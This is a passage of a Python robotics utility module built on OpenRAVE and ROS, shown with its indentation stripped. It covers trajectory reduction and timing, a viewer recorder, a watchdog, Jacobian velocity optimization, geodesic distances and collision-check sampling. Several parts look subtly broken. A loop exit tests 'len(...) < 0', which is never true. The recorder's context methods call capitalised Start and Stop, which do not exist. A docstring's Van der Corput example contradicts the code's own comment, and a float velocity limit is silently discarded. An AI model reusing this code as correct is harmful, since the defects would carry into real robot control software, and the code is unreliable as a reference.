max_err_vals = numpy.max(errors, axis=0)
# Add any extrema that deviated more than joint resolution.
max_err_idx = max_err_idx[max_err_vals > resolutions]
mask[max_err_idx] = True
# If none deviated more than joint resolution, the set is complete.
if len(max_err_idx) < 0:
break
# Return a new reduced trajectory.
import openravepy
reduced_traj = openravepy.RaveCreateTrajectory(traj.GetEnv(),
traj.GetXMLId())
reduced_traj.Init(cspec)
for (new_idx, old_idx) in enumerate(mask.nonzero()[0]):
reduced_traj.Insert(new_idx, traj.GetWaypoint(old_idx))
return reduced_traj
class Recorder(object):
MPEG = 13
def __init__(self, env, filename, width=1920, height=1080, codec=MPEG):
self.env = env
self.filename = filename
self.width = width
self.height = height
self.codec = codec
self.module = openravepy.RaveCreateModule(env, 'ViewerRecorder')
env.Add(self.module)
def __enter__(self):
self.Start()
def __exit__(self, type, value, traceback):
self.Stop()
def start(self):
cmd = ('Start {width:d} {height:d} 30 '
'codec {codec:d} timing realtime filename {filename:s}\n'
'viewer {viewer:s}'
.format(width=self.width, height=self.height,
codec=self.codec, filename=self.filename,
viewer=self.env.GetViewer().GetName()))
self.module.SendCommand(cmd)
def stop(self):
self.module.SendCommand('Stop')
class AlignmentToken(object):
def __init__(self, env, child_frame, extents,
pose=None, period=0.05, parent_frame='world'):
self.child_frame = child_frame
self.parent_frame = parent_frame
self.period = period
with env:
self.body = openravepy.RaveCreateKinBody(env, '')
aabbs = numpy.concatenate(([0., 0., 0.], extents)).reshape((1, 6))
self.body.InitFromBoxes(aabbs, True)
self.body.SetName('frame:' + child_frame)
if pose is not None:
self.body.SetTransform(pose)
env.Add(self.body, True)
import tf
self.broadcaster = tf.TransformBroadcaster()
self.update()
def update(self):
import rospy
with self.body.GetEnv():
or_pose = self.body.GetTransform()
or_quaternion = openravepy.quatFromRotationMatrix(or_pose)
position = tuple(or_pose[0:3, 3])
orientation = (or_quaternion[1], or_quaternion[2],
or_quaternion[3], or_quaternion[0])
self.broadcaster.sendTransform(position, orientation, rospy.Time.now(),
self.child_frame, self.parent_frame)
self.timer = threading.Timer(self.period, self.update)
self.timer.daemon = True
self.timer.start()
def destroy(self):
self.body.GetEnv().Remove(self.body)
self.body = None
class Timer(object):
def __init__(self, message=None):
self.message = message
self.start = 0
def __enter__(self):
if self.message is not None:
logging.info('%s started execution.', self.message)
self.start = time.time()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
if self.message is not None:
logging.info('%s executed in %.5f seconds.',
self.message, self.get_duration())
def stop(self):
self.end = time.time()
def get_duration(self):
return self.end - self.start
class Watchdog(object):
"""
Calls specified function after duration, unless reset/stopped beforehand
@param timeout_duration how long to wait before calling handler
@param handler function to call after timeout_duration
@param args for handler
@param kwargs for handler
"""
def __init__(self, timeout_duration, handler, args=(), kwargs={}):
self.timeout_duration = timeout_duration
self.handler = handler
self.handler_args = args
self.handler_kwargs = kwargs
self.thread_checking_time = threading.Thread(
target=self._check_timer_loop)
self.timer_thread_lock = threading.Lock()
self.start_time = time.time()
self.canceled = False
self.thread_checking_time.start()
def reset(self):
"""
Resets the timer.
Causes the handler function to be called after the next timeout
duration is reached. Also restarts the timer thread if it has existed.
"""
with self.timer_thread_lock:
if self.canceled or not self.thread_checking_time.is_alive():
self.thread_checking_time = threading.Thread(
target=self._check_timer_loop)
self.thread_checking_time.start()
self.start_time = time.time()
self.canceled = False
def stop(self):
"""
Stop the watchdog, so it will not call handler
"""
with self.timer_thread_lock:
self.canceled = True
def _check_timer_loop(self):
"""
Internal function for timer thread to loop
If elapsed time has passed, calls the handler function
Exists if watchdog was canceled, or handler was called
"""
while True:
with self.timer_thread_lock:
if self.canceled:
break
elapsed_time = time.time() - self.start_time
if elapsed_time > self.timeout_duration:
self.handler(*self.handler_args, **self.handler_kwargs)
with self.timer_thread_lock:
self.canceled = True
break
else:
time.sleep(self.timeout_duration - elapsed_time)
def quadraticPlusJointLimitObjective(dq, J, dx, q, q_min, q_max,
delta_joint_penalty=5e-1,
lambda_dqdist=0.01,
*args):
"""
Quadratic and joint-limit-avoidance objective for SciPy's optimization.
@param dq joint velocity
@param J Jacobian
@param dx desired twist
@param q current joint values
@param q_min lower joint limit
@param q_max upper joint limit
@param delta_joint_penalty distance from limit with penality
@param lamdbda_dqdist weighting for joint limit penalty
"""
# Compute quadratic distance part.
objective, gradient = quadraticObjective(dq, J, dx)
# Add penalty for joint limit avoidance.
qdiff_lower = delta_joint_penalty - (q - q_min)
qdiff_upper = delta_joint_penalty - (q_max - q)
dq_target = [diff_lower if diff_lower > 0. else
(-diff_upper if diff_upper > 0. else 0.)
for diff_lower, diff_upper in zip(qdiff_lower, qdiff_upper)]
objective += lambda_dqdist * 0.5 * sum(numpy.square(dq - dq_target))
gradient += lambda_dqdist * (dq - dq_target)
return objective, gradient
def quadraticObjective(dq, J, dx, *args):
"""
Quadratic objective function for SciPy's optimization.
@param dq joint velocity
@param J Jacobian
@param dx desired twist
@return objective the objective function
@return gradient the analytical gradient of the objective
"""
error = (numpy.dot(J, dq) - dx)
objective = 0.5 * numpy.dot(numpy.transpose(error), error)
gradient = numpy.dot(numpy.transpose(J), error)
return objective, gradient
def ComputeJointVelocityFromTwist(
robot, twist, objective=quadraticObjective, dq_init=None,
joint_limit_tolerance=3e-2, joint_velocity_limits=None):
"""
Computes the optimal joint velocity given a twist by formulating
the problem as a quadratic optimization with box constraints and
using SciPy's L-BFGS-B solver.
@params robot the robot
@params twist the desired twist in se(3)
with float('NaN') for dimensions we don't care about
@params objective optional objective function to optimize
defaults to quadraticObjective
@params dq_init optional initial guess for optimal joint velocity
defaults to robot.GetActiveDOFVelocities()
@params joint_velocity_limits override the robot's joint velocity limit;
defaults to robot.GetActiveDOFMaxVel()
@params joint_limit_tolerance if less then this distance to joint
limit, velocity is bounded in that direction to 0
@return dq_opt optimal joint velocity
@return twist_opt actual achieved twist
can be different from desired twist due to constraints
"""
manip = robot.GetActiveManipulator()
robot.SetActiveDOFs(manip.GetArmIndices())
if joint_velocity_limits is None:
joint_velocity_limits = robot.GetActiveDOFMaxVel()
elif isinstance(joint_velocity_limits, float):
joint_velocity_limits = numpy.array(
[numpy.PINF] * robot.GetActiveDOF())
if len(joint_velocity_limits) != robot.GetActiveDOF():
raise ValueError(
'Joint velocity limits has incorrect length:'
' Expected {:d}, got {:d}.'.format(
robot.GetActiveDOF(), len(joint_velocity_limits)))
elif (joint_velocity_limits <= 0.).any():
raise ValueError('One or more joint velocity limit is not positive.')
jacobian_spatial = manip.CalculateJacobian()
jacobian_angular = manip.CalculateAngularVelocityJacobian()
jacobian = numpy.vstack((jacobian_spatial, jacobian_angular))
rows = [i for i, x in enumerate(twist) if math.isnan(x) is False]
twist_active = twist[rows]
jacobian_active = jacobian[rows, :]
bounds = numpy.column_stack(
(-joint_velocity_limits, joint_velocity_limits))
# Check for joint limits
q_curr = robot.GetActiveDOFValues()
q_min, q_max = robot.GetActiveDOFLimits()
dq_bounds = [
(0., max) if q_curr[i] <= q_min[i] + joint_limit_tolerance else
(min, 0.) if q_curr[i] >= q_max[i] - joint_limit_tolerance else
(min, max) for i, (min, max) in enumerate(bounds)
]
if dq_init is None:
dq_init = robot.GetActiveDOFVelocities()
opt = scipy.optimize.fmin_l_bfgs_b(
objective, dq_init, fprime=None,
args=(jacobian_active, twist_active, q_curr, q_min, q_max),
bounds=dq_bounds, approx_grad=False
)
dq_opt = opt[0]
twist_opt = numpy.dot(jacobian, dq_opt)
return dq_opt, twist_opt
def GeodesicTwist(t1, t2):
"""
Computes the twist in global coordinates that corresponds
to the gradient of the geodesic distance between two transforms.
@param t1 current transform
@param t2 goal transform
@return twist in se(3)
"""
trel = numpy.dot(numpy.linalg.inv(t1), t2)
trans = numpy.dot(t1[0:3, 0:3], trel[0:3, 3])
omega = numpy.dot(t1[0:3, 0:3],
openravepy.axisAngleFromRotationMatrix(
trel[0:3, 0:3]))
return numpy.hstack((trans, omega))
def GeodesicError(t1, t2):
"""
Computes the error in global coordinates between two transforms.
@param t1 current transform
@param t2 goal transform
@return a 4-vector of [dx, dy, dz, solid angle]
"""
trel = numpy.dot(numpy.linalg.inv(t1), t2)
trans = numpy.dot(t1[0:3, 0:3], trel[0:3, 3])
omega = openravepy.axisAngleFromRotationMatrix(trel[0:3, 0:3])
angle = numpy.linalg.norm(omega)
return numpy.hstack((trans, angle))
def AngleBetweenQuaternions(quat1, quat2):
"""
Compute the angle between two quaternions.
From 0 to 2pi.
"""
theta = numpy.arccos(2.0 * (quat1.dot(quat2))**2 - 1.0)
return theta
def AngleBetweenRotations(rot1, rot2):
"""
Compute the angle between two 3x3 rotation matrices.
From 0 to 2pi.
"""
quat1 = openravepy.quatFromRotationMatrix(rot1)
quat2 = openravepy.quatFromRotationMatrix(rot2)
return AngleBetweenQuaternions(quat1, quat2)
def GeodesicDistance(t1, t2, r=1.0):
"""
Computes the geodesic distance between two transforms
@param t1 current transform
@param t2 goal transform
@param r in units of meters/radians converts radians to meters
"""
error = GeodesicError(t1, t2)
error[3] = r * error[3]
return numpy.linalg.norm(error)
def GetGeodesicDistanceBetweenTransforms(T0, T1, r=1.0):
"""
Wrapper, to match GetGeodesicDistanceBetweenQuaternions()
Calculate the geodesic distance between two transforms, being
gd = norm( relative translation + r * axis-angle error )
@param t1 current transform
@param t2 goal transform
@param r in units of meters/radians converts radians to meters
"""
return GeodesicDistance(T0, T1, r)
def GetEuclideanDistanceBetweenPoints(p0, p1):
"""
Calculate the Euclidean distance (L2 norm) between two vectors.
"""
sum = 0.0
for i in xrange(len(p0)):
sum = sum + (p0[i] - p1[i]) * (p0[i] - p1[i])
return numpy.sqrt(sum)
def GetEuclideanDistanceBetweenTransforms(T0, T1):
"""
Calculate the Euclidean distance between the translational
component of two 4x4 transforms.
(also called L2 or Pythagorean distance)
"""
p0 = T0[0:3, 3] # Get the x,y,z translation from the 4x4 matrix
p1 = T1[0:3, 3]
return GetEuclideanDistanceBetweenPoints(p0, p1)
def GetMinDistanceBetweenTransformAndWorkspaceTraj(T, traj, dt=0.01):
"""
Find the location on a workspace trajectory which is closest
to the specified transform.
@param numpy.matrix T: A 4x4 transformation matrix.
@param openravepy.Trajectory traj: A timed workspace trajectory.
@param float dt: Resolution at which to sample along the trajectory.
@return (float,float) (min_dist, t_loc, T_loc) The minimum distance,
the time value along the timed
trajectory, and the transform.
"""
if not IsTimedTrajectory(traj):
raise ValueError("Trajectory must have timing information.")
if not IsTrajectoryTypeIkParameterizationTransform6D(traj):
raise ValueError("Trajectory is not a workspace trajectory, it "
"must have configuration specification of "
"openravepy.IkParameterizationType.Transform6D")
def _GetError(t):
T_curr = openravepy.matrixFromPose(traj.Sample(t)[0:7])
error = GetEuclideanDistanceBetweenTransforms(T, T_curr)
return error
min_dist = numpy.inf
t_loc = 0.0
T_loc = None
# Iterate over the trajectory
t = 0.0
duration = traj.GetDuration()
while t < duration:
error = _GetError(t)
if error < min_dist:
min_dist = error
t_loc = t
t = t + dt
# Also check the end-point
error = _GetError(duration)
if error < min_dist:
min_dist = error
t_loc = t
T_loc = openravepy.matrixFromPose(traj.Sample(t_loc)[0:7])
return (min_dist, t_loc, T_loc)
def FindCatkinResource(package, relative_path):
"""
Find a Catkin resource in the share directory or
the package source directory. Raises IOError
if resource is not found.
@param relative_path Path relative to share or package source directory
@param package The package to search in
@return Absolute path to resource
"""
from catkin.find_in_workspaces import find_in_workspaces
paths = find_in_workspaces(project=package, search_dirs=['share'],
path=relative_path, first_match_only=True)
if paths and len(paths) == 1:
return paths[0]
else:
raise IOError('Loading resource "{:s}" failed.'.format(
relative_path))
def IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx):
"""
Check if robot is at a particular waypoint in a trajectory.
This function examines the current DOF values of the specified
robot and compares these values to the first waypoint of the
specified trajectory. If the DOF values specified in the trajectory
differ by less than the DOF resolution of the specified joint/axis
then it will return True. Otherwise, it returns False.
NOTE: This is used in ExecuteTrajectory(),
IsAtTrajectoryStart(), and
IsAtTrajectoryEnd()
@param robot: The robot whose active DOFs will be checked.
@param trajectory: The trajectory containing the waypoint
to be checked.
@returns: True The robot is at the desired position.
False One or more joints differ by DOF resolution.
"""
if trajectory.GetNumWaypoints() == 0:
raise ValueError('Trajectory has 0 waypoints!')
cspec = trajectory.GetConfigurationSpecification()
needs_base = HasAffineDOFs(cspec)
needs_joints = HasJointDOFs(cspec)
if needs_base and needs_joints:
raise ValueError('Trajectories with affine and joint DOFs are '
'not supported')
if trajectory.GetEnv() != robot.GetEnv():
raise ValueError('The environment attached to the trajectory '
'does not match the environment attached to '
'the robot in IsAtTrajectoryStart().')
if needs_base:
rtf = robot.GetTransform()
doft = (openravepy.DOFAffine.X |
openravepy.DOFAffine.Y |
openravepy.DOFAffine.RotationAxis)
curr_pose = openravepy.RaveGetAffineDOFValuesFromTransform(rtf, doft)
start_transform = numpy.eye(4)
waypoint = trajectory.GetWaypoint(0)
start_t = cspec.ExtractTransform(start_transform, waypoint, robot)
traj_start = openravepy.RaveGetAffineDOFValuesFromTransform(
start_t, doft)
# Compare translation distance
trans_delta_value = abs(curr_pose[:2] - traj_start[:2])
trans_resolution = robot.GetAffineTranslationResolution()[:2]
if trans_delta_value[0] > trans_resolution[0] or \
trans_delta_value[1] > trans_resolution[1]:
return False
# Compare rotation distance
rot_delta_value = abs(wrap_to_interval(curr_pose[2] - traj_start[2]))
rot_res = robot.GetAffineRotationAxisResolution()[2] # Rot about z?
if rot_delta_value > rot_res:
return False
else:
# Get joint indices used in the trajectory,
# and the joint positions at this waypoint
waypoint = trajectory.GetWaypoint(waypoint_idx)
dof_indices, _ = cspec.ExtractUsedIndices(robot)
goal_config = cspec.ExtractJointValues(waypoint, robot, dof_indices)
# Return false if any joint deviates too much
return IsAtConfiguration(robot, goal_config, dof_indices)
return True
def IsAtTrajectoryStart(robot, trajectory):
"""
Check if robot is at the configuration specified by
the FIRST waypoint in a trajectory.
"""
waypoint_idx = 0
return IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx)
def IsAtTrajectoryEnd(robot, trajectory):
"""
Check if robot is at the configuration specified by
the LAST waypoint in a trajectory.
"""
waypoint_idx = trajectory.GetNumWaypoints() - 1
return IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx)
def IsAtConfiguration(robot, goal_config, dof_indices=None):
"""
Check if robot's joints have reached a desired configuration.
If the DOF indices are not specified, the robot's active DOF
will be used.
@param robot The robot object.
@param goal_config The desired configuration, an array of joint
positions.
@param dof_indices The joint index numbers.
@return boolean Returns True if joints are at goal position,
within DOF resolution.
"""
# If DOF indices not specified, use the active DOF by default
if dof_indices is None:
dof_indices = robot.GetActiveDOFIndices()
# Get current position of joints
with robot.GetEnv():
joint_values = robot.GetDOFValues(dof_indices)
dof_resolutions = robot.GetDOFResolutions(dof_indices)
# If any joint is not at the goal position, return False
for i in xrange(0, len(goal_config)):
# Get the axis index for this joint, which is 0
# for revolute joints or 0-2 for spherical joints.
joint = robot.GetJointFromDOFIndex(dof_indices[i])
axis_idx = dof_indices[i] - joint.GetDOFIndex()
# Use OpenRAVE method to check the configuration
# difference value1-value2 for axis i,
# taking into account joint limits and wrapping
# of continuous joints.
delta_value = abs(joint.SubtractValue(joint_values[i], goal_config[i],
axis_idx))
if delta_value > dof_resolutions[i]:
return False
# If all joints match the goal, return True
return True
def IsTimedTrajectory(trajectory):
"""
Returns True if the trajectory is timed.
This function checks whether a trajectory has a valid `deltatime` group,
indicating that it is a timed trajectory.
@param trajectory: an OpenRAVE trajectory
@returns: True if the trajectory is timed, False otherwise
"""
cspec = trajectory.GetConfigurationSpecification()
empty_waypoint = numpy.zeros(cspec.GetDOF())
return cspec.ExtractDeltaTime(empty_waypoint) is not None
def IsJointSpaceTrajectory(traj):
"""
Check if trajectory is a joint space trajectory.
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
cspec = traj.GetConfigurationSpecification()
if cspec.GetGroupFromName("joint_values"):
return True
except openravepy.openrave_exception:
pass
return False
def IsWorkspaceTrajectory(traj):
"""
Check if trajectory is a workspace trajectory.
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
return IsTrajectoryTypeIkParameterizationTransform6D(traj)
def IsTrajectoryTypeIkParameterization(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization:
Transform6d
Rotation3D
Translation3D
Direction3D
Ray4D
Lookat3D
TranslationDirection5D
TranslationXY2D
TranslationXYOrientation3D
TranslationLocalGlobal6D
TranslationXAxisAngle4D
TranslationYAxisAngle4D
TranslationZAxisAngle4D
TranslationXAxisAngleZNorm4D
TranslationYAxisAngleXNorm4D
TranslationZAxisAngleYNorm4D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
cspec = traj.GetConfigurationSpecification()
if cspec.GetGroupFromName("ikparam_values"):
return True
except openravepy.openrave_exception:
pass
return False
def IsTrajectoryTypeIkParameterizationTransform6D(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization.Transform6D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
IKP_type = openravepy.IkParameterizationType.Transform6D
# The IKP type must be passed as a number
group_name = "ikparam_values {0}".format(int(IKP_type))
if traj.GetConfigurationSpecification().GetGroupFromName(group_name):
return True
except openravepy.openrave_exception:
pass
return False
def IsTrajectoryTypeIkParameterizationTranslationDirection5D(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization.TranslationDirection5D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
IKP_type = openravepy.IkParameterizationType.TranslationDirection5D
group_name = "ikparam_values {0}".format(int(IKP_type))
if traj.GetConfigurationSpecification().GetGroupFromName(group_name):
return True
except openravepy.openrave_exception:
pass
return False
def ComputeEnabledAABB(kinbody):
"""
Returns the AABB of the enabled links of a KinBody.
@param kinbody: an OpenRAVE KinBody
@returns: AABB of the enabled links of the KinBody
"""
from numpy import NINF, PINF
from openravepy import AABB
min_corner = numpy.array([PINF] * 3)
max_corner = numpy.array([NINF] * 3)
for link in kinbody.GetLinks():
if link.IsEnabled():
link_aabb = link.ComputeAABB()
center = link_aabb.pos()
half_extents = link_aabb.extents()
min_corner = numpy.minimum(center - half_extents, min_corner)
max_corner = numpy.maximum(center + half_extents, max_corner)
center = (min_corner + max_corner) / 2.
half_extents = (max_corner - min_corner) / 2.
return AABB(center, half_extents)
def UntimeTrajectory(trajectory, env=None):
"""
Returns an untimed copy of the provided trajectory.
This function strips the DeltaTime group from a timed trajectory to create
an untimed trajectory.
@param trajectory: an OpenRAVE trajectory
@returns: an untimed copy of the provided trajectory.
"""
cspec = trajectory.GetConfigurationSpecification()
cspec.RemoveGroups('deltatime', True)
waypoints = trajectory.GetWaypoints(0, trajectory.GetNumWaypoints(), cspec)
path = openravepy.RaveCreateTrajectory(env or trajectory.GetEnv(),
trajectory.GetXMLId())
path.Init(cspec)
path.Insert(0, waypoints)
return path
def ComputeUnitTiming(robot, traj, env=None):
"""
Compute the unit velocity timing of a path or trajectory.
@param robot: robot whose DOFs should be considered
@param traj: path or trajectory
@param env: environment to create the output trajectory in; defaults to the
same environment as the input trajectory
@returns: trajectory with unit velocity timing
"""
from openravepy import RaveCreateTrajectory
if env is None:
env = traj.GetEnv()
old_cspec = traj.GetConfigurationSpecification()
dof_indices, _ = old_cspec.ExtractUsedIndices(robot)
with robot.CreateRobotStateSaver():
robot.SetActiveDOFs(dof_indices)
new_cspec = robot.GetActiveConfigurationSpecification('linear')
new_cspec.AddDeltaTimeGroup()
new_traj = RaveCreateTrajectory(env, '')
new_traj.Init(new_cspec)
dof_values_prev = None
for i in range(traj.GetNumWaypoints()):
old_waypoint = traj.GetWaypoint(i)
dof_values = old_cspec.ExtractJointValues(
old_waypoint, robot, dof_indices)
if i == 0:
deltatime = 0.
else:
deltatime = numpy.linalg.norm(dof_values - dof_values_prev)
dof_values_prev = dof_values
new_waypoint = numpy.zeros(new_cspec.GetDOF())
new_cspec.InsertJointValues(new_waypoint, dof_values,
robot, dof_indices, 0)
new_cspec.InsertDeltaTime(new_waypoint, deltatime)
new_traj.Insert(i, new_waypoint)
return new_traj
def ComputeGeodesicUnitTiming(traj, env=None, alpha=1.0):
"""
Compute the geodesic unit velocity timing of a workspace path or
trajectory, also called a path length parameterization.
The path length is calculated as the sum of all segment lengths,
where each segment length = norm( delta_translation^2 +
alpha^2*delta_orientation^2 )
Note: Currently only linear velocity interpolation is supported,
however OpenRAVE does allow you to specify quadratic
interpolation.
@param traj: Workspace path or trajectory
@param env: Environment to create the output trajectory in, defaults
to the same environment as the input trajectory.
@param alpha: Weighting for delta orientation.
@returns: A workspace trajectory with unit velocity timing.
"""
if not IsTrajectoryTypeIkParameterizationTransform6D(traj):
raise ValueError("Trajectory is not a workspace trajectory, it "
"must have configuration specification of "
"openravepy.IkParameterizationType.Transform6D")
num_waypoints = traj.GetNumWaypoints()
if num_waypoints <= 1:
raise ValueError("Trajectory needs more than 1 waypoint.")
if env is None:
env = traj.GetEnv()
ikparam = openravepy.IkParameterization
ikparam_type = openravepy.IkParameterizationType
# Create a new workspace trajectory with the same spec
# as the old one
new_traj = openravepy.RaveCreateTrajectory(env, '')
new_cspec = ikparam.GetConfigurationSpecificationFromType(
ikparam_type.Transform6D, 'linear')
new_cspec.AddDeltaTimeGroup()
new_traj.Init(new_cspec)
# Get the current pose of the end effector
# Note: OpenRAVE pose is [qx,qy,qz,qw, tx,ty,tz]
# The 8th value is velocity.
P_ee_prev = traj.GetWaypoint(0)[range(7)]
for i in range(num_waypoints):
P_ee = traj.GetWaypoint(i)[range(7)] # Get 7 pose values
# Compute the translation delta
p0 = P_ee_prev[4:7] # Get the x,y,z translation
p1 = P_ee[4:7]
delta_translation = numpy.sqrt(numpy.sum((p0 - p1)**2))
# Compute the orientation delta
q0 = P_ee_prev[0:4] # Get qx,qy,qz,qw rotation
q1 = P_ee[0:4]
delta_angle = AngleBetweenQuaternions(q0, q1)
dist = numpy.sqrt(delta_translation**2 + (alpha**2) * (delta_angle**2))
if i == 0:
deltatime = 0.0
else:
deltatime = dist
P_ee_prev = P_ee
# Insert a new waypoint (1x7 pose, velocity)
values = numpy.append(P_ee, [deltatime])
new_traj.Insert(i, values)
return new_traj
def CheckJointLimits(robot, q, deterministic=None):
"""
Check if a configuration is within a robot's joint position limits.
If outside limits, this procedure throws an exception
of type JointLimitError.
@param openravepy.robot robot: The robot.
@param list q: List or array of joint positions.
"""
from prpy.planning.exceptions import JointLimitError
q_limit_min, q_limit_max = robot.GetActiveDOFLimits()
active_dof_indices = robot.GetActiveDOFIndices()
if len(q) != len(active_dof_indices):
raise ValueError('The number of joints in the configuration q '
'is not equal to the number of active DOF.')
lower_position_violations = (q < q_limit_min)
if lower_position_violations.any():
index = lower_position_violations.nonzero()[0][0]
raise JointLimitError(
robot,
dof_index=active_dof_indices[index],
dof_value=q[index],
dof_limit=q_limit_min[index],
description='position',
deterministic=deterministic)
upper_position_violations = (q > q_limit_max)
if upper_position_violations.any():
index = upper_position_violations.nonzero()[0][0]
raise JointLimitError(
robot,
dof_index=active_dof_indices[index],
dof_value=q[index],
dof_limit=q_limit_max[index],
description='position',
deterministic=deterministic)
def GetForwardKinematics(robot, q, manipulator=None, frame=None):
"""
Get the forward kinematics for a specific joint configuration,
relative to the OpenRAVE world frame.
@param openravepy.robot robot: The robot object.
@param list q: List or array of joint positions.
@param manipulator
@param string frame: Get the end effector transform relative to a
specific frame e.g. '/right/wam_base'
@returns T_ee: The pose of the end effector (or last link in the
serial chain) as a 4x4 matrix.
"""
if manipulator is None:
manipulator = robot.GetActiveManipulator()
T_ee = None
# Save the robot state
sp = openravepy.Robot.SaveParameters
robot_saver = robot.CreateRobotStateSaver(sp.LinkTransformation)
with robot_saver:
robot.SetActiveDOFValues(q)
T_ee = manipulator.GetEndEffectorTransform()
# Robot state is restored
if frame is not None:
link = robot.GetLink(frame)
if link is None:
raise ValueError('Failed to get link \'{:s}\''.format(frame))
T_ref_frame = link.GetTransform()
T_ee = numpy.dot(numpy.linalg.inv(T_ref_frame), T_ee)
return T_ee
def ConvertIntToBinaryString(x, reverse=False):
"""
Convert an integer to a binary string.
Optionally reverse the output string, which is
required for producing a Van Der Corput sequence.
@param int x: The number to be converted.
@param bool reverse: If True, the output string will be reversed.
@returns string: A binary number as a string.
"""
if type(x) != int:
raise ValueError('Input number must be an integer')
if reverse:
return ''.join(reversed(bin(x)[2:]))
return ''.join(bin(x)[2:])
def VanDerCorputSequence(lower=0.0, upper=1.0, include_endpoints=True):
"""
Generate the binary Van der Corput sequence, where each value
is a dyadic fraction re-scaled to the desired range.
For example, on the interval [0,1], the first 5 values of
the Van der Corput sequence are:
[0.0, 1.0, 0.5, 0.5, 0.75]
@param float lower: The first value of the range of the sequence.
@param float upper: The last value of the range of the sequence.
@param bool include_endpoints: If True, the output sequence will
include the value 'lower' and the
value 'upper'.
If False, these endpoint values
will not be returned.
@returns generator: A sequence of float values.
"""
from itertools import count, chain
if include_endpoints is True:
endpoints = (0.0, 1.0)
else:
endpoints = []
# Get a sequence of reversed binary numbers:
# '1', '01', '11', '001', '101', '011', '111', '0001', ....
#
# Note: count(1) is a generator, starting at 1, making steps of 1.
reverse_binary_seq = (ConvertIntToBinaryString(x, True) for x in count(1))
# From the reversed binary sequence, generate the Van der Corput
# sequence, for which: 0.0 < x < 1.0 (the end-points are excluded)
# 0.5, 0.25, 0.75, 0.125, 0.625, 0.375, 0.875, 0.0625, ....
#
# Note: int(x,2) converts the binary string (base 2) to an integer.
raw_seq = (float(int(x, 2)) / (2**len(x)) for x in reverse_binary_seq)
# Scale the Van der Corput sequence across the desired range
# and optionally add the end-points.
scale = float(upper - lower)
return (scale * val + lower for val in chain(endpoints, raw_seq))
def SampleTimeGenerator(start, end, step=1, include_endpoints=False, **kwargs):
"""
Generate a linear sequence of values from start to end, with
specified step size. Works with int or float values.
The end value is also returned if it's more than half the
distance from the previously returned value.
For example, on the interval [0.0,5.0], the sequence is:
[0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
@param float start: The start value of the sequence.
@param float end: The last value of the sequence.
@param float step: The step-size between values.
@param bool include_endpoints: If true, include the start and end value
@returns generator: A sequence of float values.
"""
if end <= start:
raise ValueError("The 'end' value must be greater than "
"the 'start' value.")
if not (step > 0):
raise ValueError("The 'step' value must be positive.")
t = start
prev_t = 0.0
while t <= numpy.floor(end):
yield t
prev_t = t
t = t + step
if (end - float(prev_t)) > (step / 2.0):
yield float(end)
prev_t = end
if include_endpoints and (end - float(prev_t)) > 1e-6:
yield float(end)
def VanDerCorputSampleGenerator(start, end, step=2, **kwargs):
"""
This wraps VanDerCorputSequence() in a way that's useful for
collision-checking.
Generates a sequence of values from start to end, with specified
step size, using an approximate binary Van der Corput sequence.
The start and end values will always be checked first.
For example, on the interval [0.0, 13.7], the sequence is:
[0.0, 13.7, 12.0, 6.0, 4.0, 8.0, 2.0, 10.0]
@param float start: The start value of the sequence.
@param float end: The last value of the sequence.
@param float step: The step-size between values.
@returns generator: A sequence of float values.
"""
# 'start' and 'end' must be positive because
# itertools.islice() only accepts a positive integer
if end <= start:
raise ValueError("The 'end' value must be greater than "
"the 'start' value.")
if not (step > 0):
raise ValueError("The 'step' value must be positive.")
# Construct the points at which checks must occur to cover this range.
check_bins = numpy.arange(start, end, step)
is_checked = [False] * len(check_bins)
# Always return the start and end points first.
is_checked[0] = True
yield start
yield end
# Return a collision-checking sequence that eventually covers the range.
vdc = VanDerCorputSequence(lower=start, upper=end, include_endpoints=False)
for s in vdc:
if numpy.all(is_checked):
return
idx = numpy.digitize((s,), check_bins, right=True)
assert idx.shape == (1,)
if is_checked[idx[0]]:
continue
is_checked[idx[0]] = True
yield float(check_bins[idx])
def GetCollisionCheckPts(robot, traj, include_start=True, start_time=0.,
first_step=None, epsilon=1e-6):
"""
Generate a list of (time, configuration) pairs to collision check.
If every generated configuration is collision free, then the trajectory is
guaranteed to be collision free up to DOF resolution. This function only
operates on timed trajectories. If you want to use this function on a path,
then consider using the util.ComputeUnitTiming function to compute its
arclength parameterization.
@param trajectory: timed trajectory
@returns generator of (time, configuration) pairs
"""
# TODO: This enters an infinite loop if start_time is non-zero.
if not IsTimedTrajectory(traj):
raise ValueError(
'Trajectory must be timed. If you want to use this function on a'
' path, then consider using util.ComputeUnitTiming to compute its'
' arclength parameterization.')
cspec = traj.GetConfigurationSpecification()
dof_indices, _ = cspec.ExtractUsedIndices(robot)
q_resolutions = robot.GetDOFResolutions()[dof_indices]
duration = traj.GetDuration()
if not (0. <= start_time < duration + epsilon):
raise ValueError(
'Start time {:.6f} is out of range [0, {:.6f}].'.format(
start_time, duration))
start_time = min(start_time, duration)
if first_step is None:
first_step = duration - start_time
if not (0. < first_step <= duration - start_time):
raise ValueError(
'First step {:.6f} is out of range (0, {:.6f}]'.format(
first_step, duration - start_time))
# Bisection method. Start at the begining of the trajectory and initialize
# the stepsize to the end of the trajectory.
t_prev = start_time
q_prev = cspec.ExtractJointValues(
traj.GetWaypoint(t_prev), robot, dof_indices)
dt = first_step
# Always collision check the first point.
if include_start:
yield t_prev, q_prev
while t_prev < duration - epsilon:
t_curr = t_prev + dt
q_curr = cspec.ExtractJointValues(
traj.Sample(t_curr), robot, dof_indices)
# Step violated dof resolution. Halve the step size and continue.
if (numpy.abs(q_curr - q_prev) > q_resolutions).any():
dt = dt / 2.
# Yield this configuration. Double the step size and continue.
else:
yield t_curr, q_curr
q_prev = q_curr
t_prev = min(t_curr, duration)
dt = 2. * dt
def GetLinearCollisionCheckPts(robot, traj, norm_order=2, sampling_func=None):
"""
For a piece-wise linear trajectory, generate a list
of configuration pairs that need to be collision checked.
